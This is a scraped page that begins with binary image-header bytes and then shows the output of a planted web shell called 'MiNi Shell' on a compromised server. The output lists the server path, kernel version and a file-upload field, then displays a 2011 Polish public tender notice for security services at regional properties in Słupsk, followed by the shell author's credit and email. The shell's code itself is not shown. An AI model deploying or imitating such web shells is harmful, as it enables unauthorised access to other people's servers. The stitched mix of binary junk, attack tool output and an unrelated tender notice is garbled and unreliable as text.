JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111213/425028-N-2011.html

<p class="kh_header"><b>Gdańsk: Usługa ochrony obiektów i mienia na terenie nieruchomości zabudowanych zlokalizowanych w Słupsku stanowiących własność Województwa Pomorskiego</b><br>
<b>Numer ogłoszenia: 425028 - 2011; data zamieszczenia: 13.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony obiektów i mienia na terenie nieruchomości zabudowanych zlokalizowanych w Słupsku stanowiących własność Województwa Pomorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja usługi ochrony obiektów i mienia na terenie nieruchomości zabudowanych zlokalizowanych w Słupsku, stanowiących własność Województwa Pomorskiego, polegającej na zapewnieniu kontroli nad infrastrukturą obiektów. Usługa będzie realizowana przez pracowników ochrony fizycznej, posiadających licencję I lub II stopnia (dalej zwanych pracownikami ochrony) w formie bezpośredniej i stałej ochrony fizycznej oraz poprzez techniczne zabezpieczenia nieruchomości w formie całodobowego monitoringu (urządzenia i systemy alarmowe).
2. Przedmiot zamówienia obejmuje następujące nieruchomości:
1) Nieruchomość położona w Słupsku przy ul. Kopernika 28-31 stanowiąca działki:
a) działka nr 312/37 o powierzchni 21.498 m2 zabudowana: budynkiem głównym Szpitala o powierzchni  użytkowej 4.128 m2, częścią budynku apteki, centrali telefonicznej i statystyki o powierzchni użytkowej 272 m2, budynkiem oddziału laryngologii o powierzchni użytkowej 1.621 m2, budynkiem przychodni wielospecjalistycznej o powierzchni użytkowej 569 m2, budynkiem oddziału chorób płuc i chemioterapii o powierzchni użytkowej 1.463 m2, budynkiem drukarni o powierzchni użytkowej 96 m2, budynkiem tlenowni o powierzchni użytkowej 51 m2,	budynkiem hydroforni o powierzchni użytkowej 96 m2,	budynkiem kotłowni o powierzchni użytkowej 390 m2;
b) działka nr 312/40 o powierzchni 3.533 m2 zabudowana:budynkiem administracyjno-warsztatowym o powierzchni użytkowej 293 m2, budynkiem agregatorowi o powierzchni użytkowej 113 m2, budynkiem magazynu o powierzchni użytkowej 329 m2,
Poza w/w budynkami na terenie w/w działek znajdują się:sieć niskoparametrowa, instalacje c.o.,węzły cieplne, studnia głębinowa, drogi, ogrodzenie z bramami i furtkami, komin kotłowni.
c)	działka nr 312/39 o powierzchni 242 m2 niezabudowana,
d)	działka nr 311 o powierzchni 1096 m2 zabudowana:częścią budynku apteki, centrali telefonicznej i statystyki o powierzchni użytkowej 272 m2, budynkiem portierni o powierzchni użytkowej 15 m2.
2)	Nieruchomość położona w Słupsku przy ul. Wolności 3A stanowiąca działkę nr 312/38 o powierzchni 839 m2 zabudowana budynkiem warsztatowym o powierzchni użytkowej 120 m2; 
3)	Nieruchomość położona w Słupsku przy ul. Gustawa Morcinka stanowiąca działkę nr 312/36 o powierzchni 132 m2 niezabudowana;
4)	Nieruchomość położona w Słupsku przy ul. Poniatowskiego 42 stanowiąca działkę nr 304/3 o powierzchni 2.172 m2 zabudowaną budynkiem laboratorium o powierzchni użytkowej 744 m2;
5)	Nieruchomość położona w Słupsku przy ul. Jana Pawła II 1A stanowiąca działki:
a)	działka nr 482/7 o powierzchni 4.630 m2 zabudowana budynkiem przychodni specjalistycznych o pow. użytkowej 4.258 m2;
b)	działka nr 482/6 o powierzchni 25 m2, na której znajduje się garaż.
3.	Nieruchomości, o których mowa w ust.2 pkt.1 - 4 stanowią obszarowo jeden kompleks. Nieruchomości podlegające ochronie obrazuje załącznik nr 11 do SIWZ - Mapka sytuacyjna Słupsk.
4.	Usługa ochrony obiektu i mienia realizowana przez pracowników ochrony w formie bezpośredniej i stałej ochrony fizycznej będzie świadczona w następujący sposób:
1)	Usługa ochrony nieruchomości, o których mowa w ust.2 pkt.1-4 będzie świadczona całodobowo (24 godziny na dobę), siedem dni w tygodniu - w dni robocze, niedziele i święta (dni ustawowo wolne od pracy) przez dwóch pracowników ochrony na dwóch posterunkach. Lokalizację posterunków określi Wykonawca po zawarciu umowy.
2)	Usługa ochrony powinna być przeprowadzana przez jednakowo umundurowanych pracowników ochrony. 
3)	W razie wystąpienia sytuacji kryzysowej lub zagrożenia na terenie chronionych nieruchomości pracownicy ochrony muszą być wspierani doraźną grupą interwencyjną Wykonawcy.
4)	Pracownicy ochrony będą zobowiązani do:
a)	wykonywania obchodu nieruchomości, o których mowa w ust. 2 pkt.1-4, codziennie, co najmniej dwa razy między godz. 8:00 a godz. 17:00 oraz co dwie godziny między godz. 17:00 a godz. 8:00; godziny obchodów będą wpisywane w książkę dyżurów, o której mowa w ust. 6 pkt.4, prowadzonej osobno dla każdego z posterunków; Zamawiający wymaga aby obchody nie były wykonywane jednocześnie przez  dwóch pracowników pełniących służbę;  
b)	wykonywanie w trakcie obchodów, sprawdzenia prawidłowego zabezpieczenia drzwi, okien, krat, powiadamianie odpowiednich służb publicznych oraz osób upoważnionych przez Zamawiającego o stwierdzonych nieprawidłowościach oraz zabezpieczenie zagrożonego miejsca do czasu podjęcia odpowiednich czynności przez Zamawiającego;
c)	przeciwdziałanie kradzieżom z włamaniem, napadom, dewastacji, uszkodzeniu mienia znajdującego się w budynkach, pożarom  i innym zakłóceniom spokoju,
d)	egzekwowanie zakazu dotyczącego przebywania na terenie chronionych nieruchomości osób nieupoważnionych;
e)	otwieranie i zamykanie wejść do budynków, bram wjazdowych (jeśli istnieją) oraz wyznaczonych pomieszczeń zgodnie z upoważnieniem przekazanym przez Zamawiającego.
5.	Usługa ochrony obiektów i mienia realizowana przez techniczne zabezpieczenia nieruchomości w formie całodobowego monitoringu (urządzenia i systemy alarmowe) będzie świadczona w następujący sposób:
1)	Usługa ochrony nieruchomości, o których mowa w ust.2 pkt.1-5 będzie realizowana poprzez zapewnienie stałego dozoru, ochrony budynków i mienia znajdującego się w tych budynkach całodobowo (24 godziny na dobę), siedem dni w tygodniu - w dni robocze, niedziele i święta (dni ustawowo wolne od pracy). Usługa będzie wykonywana za pomocą zamontowanych przez Wykonawcę elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych obiektów. 
2)	W ramach realizacji usługi ochrony Wykonawca zobowiązany jest do zamontowania odpowiedniej ilość czujek, centrali, przekaźników, manipulatorów, innych niezbędnych urządzeń oraz właściwego oprzyrządowania na swój koszt, które umożliwi właściwą realizację usługi. Instalacja alarmowa zarówno w trakcie realizacji zamówienia jak i po zdemontowaniu będzie stanowić własność Wykonawcy. Wykonawca zobowiązany będzie do pokrycia wszelkich kosztów związanych z eksploatacja, naprawą i konserwacją zamontowanych systemów alarmowych. Wykonawca będzie zobowiązany do dostosowania odpowiedniej ilości i rodzaju urządzeń i systemów alarmowych, w sposób zapewniający prawidłowe zabezpieczenie chronionych budynków. Zamawiający zaleca Wykonawcy przeprowadzenie wizji lokalnej budynków w celu właściwego określenia ceny oferty. 
3)	Usługa ochrony musi być wykonywana w sposób zapewniający zapobieganie kradzieżom z włamaniem, napadom, dewastacjom, uszkodzeniu mienia znajdującego się w budynkach, pożarom  i innym zakłóceniom spokoju.
4)	Wykonawca będzie monitorował budynki, znajdujące się na nieruchomościach, o których mowa w ust.2 pkt.1-5 za pomocą systemu bezprzewodowego (np. GSM). Wykonawca będzie zobowiązany do wykonywania obchodu monitorowanej nieruchomości, o której mowa w ust.2 pkt.5 co najmniej raz w tygodniu. 
5)	Zamawiający zobowiązuje się przystosować obiekt do prawidłowego oświetlenia w porze nocnej oraz do zasilania w energię elektryczną.
6)	Wykonawca musi dysponować doraźną grupą interwencyjną, działającą przez 24 godziny na dobę, która będzie reagowała  w razie wystąpienia sytuacji zagrożenia. Czas przybycia grupy na miejsce zdarzenia nie może być dłuższy niż 10 minut od momentu zgłoszenia lub załączenia się czujek alarmowych.
7)	W przypadku stwierdzenia przez doraźną grupę interwencyjną kradzieży, ingerencji osób trzecich bądź innych sytuacji zagrożenia mających wpływ na stan faktyczny ochranianego obiektu Wykonawca zobowiązany jest do niezwłocznego powiadomienia odpowiednich służb publicznych oraz osób upoważnionych przez Zamawiającego. Ponadto w takiej sytuacji Wykonawca zobowiązany jest do bezpłatnego nadzorowania ochranianego obiektu do czasu przybycia odpowiednich służb publicznych.
6.	Obowiązki i uprawnienia Wykonawcy:
1)	powiadamianie centrum nadzorującego Wykonawcy o wystąpieniu sytuacji zagrożenia na chronionej nieruchomości celem wezwania doraźnej grupy interwencyjnej, stanowiącej jego wsparcie, 
2)	ujęcie osób stwarzających w sposób oczywisty bezpośrednie zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia, w celu niezwłocznego oddania tych osób policji;
3)	należyte przechowywanie powierzonych kluczy do chronionych nieruchomości;
4)	bieżące prowadzenie książki dyżurów, w której odnotowuje się przebieg służby, prowadzonej osobno dla dwóch posterunków oraz dla nieruchomości , o której mowa w ust. 2 pkt.5  - wpisywanie wszelkich spostrzeżeń, uwag oraz istotnych wydarzenia związanych ze sprawowaniem ochrony obiektu i mienia objętych przedmiotem zamówienia; 
5)	zapoznanie się z rozmieszczeniem i obsługą głównych wyłączników prądu, instalacji ppoż., zaworów wody itp.;
6)	zaznajomienie się z numerami telefonów terenowo właściwych jednostek policji, straży miejskiej, straży pożarnej, pogotowia ratunkowego, ekipy pogotowia technicznego oraz Departamentu Majątku Województwa w Urzędzie Marszałkowskim, w celu niezwłocznego informowania ww. w sytuacji zagrożenia.
7.	Wykonawca zobowiązany będzie do: 
1)	wyposażenia pracownika ochrony w jednolity ubiór, środki łączności, środki techniczne (np.: latarka itp.), materiały biurowe i inne elementy wyposażenia, stosownie do posiadanej przez pracownika licencji;
2)	sprawowania nadzoru nad wszystkimi zagadnieniami merytorycznymi wynikającymi z realizacji przedmiotu zamówienia oraz sprawdzania wykonywania obowiązków ochrony w porozumieniu z Departamentem Majątku Województwa;
3)	zachowania w tajemnicy wszelkich informacji, które mają lub mogą mieć wpływ na stan bezpieczeństwa Zamawiającego w czasie obowiązywania umowy oraz po jej zakończeniu;
4)	informowania Departamentu Majątku Województwa o wszelkich zauważonych usterkach i nieprawidłowościach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że posiada aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005r. Nr 145, poz. 1221 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, zrealizowali lub realizują z należytą starannością, co najmniej 2 usługi ochrony polegającą na całodobowej ochronie obiektów i mienia o wartości co najmniej 100 000 zł (brutto) każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże, że dysponuje lub będzie dysponował co najmniej 3 samochodami patrolowymi</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże, że dysponuje lub będzie dysponował co najmniej 5 pracownikami ochrony fizycznej I lub II stopnia oraz co najmniej 2 pracownikami zabezpieczenia technicznego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż 500.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ustawy przewiduje możliwość dokonania zmiany wynagrodzenia brutto Wykonawcy w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/umwp/zamowienia/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Majątku Województwa Urzędu Marszałkowskiego Woj.Pomorskiego Gdańsk 80-810 ul. Augustyńskiego 2, piętro I pok.111, poniedziałek-piątek 7:45-15:45.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 11:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Woj.Pomorskiego Gdańsk 80-810 ul. Okopowa 21/27 parter pokój 4A, oferty należy składać w godzinach pracy Urzędu poniedziałek-piątek 7:45-15:15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com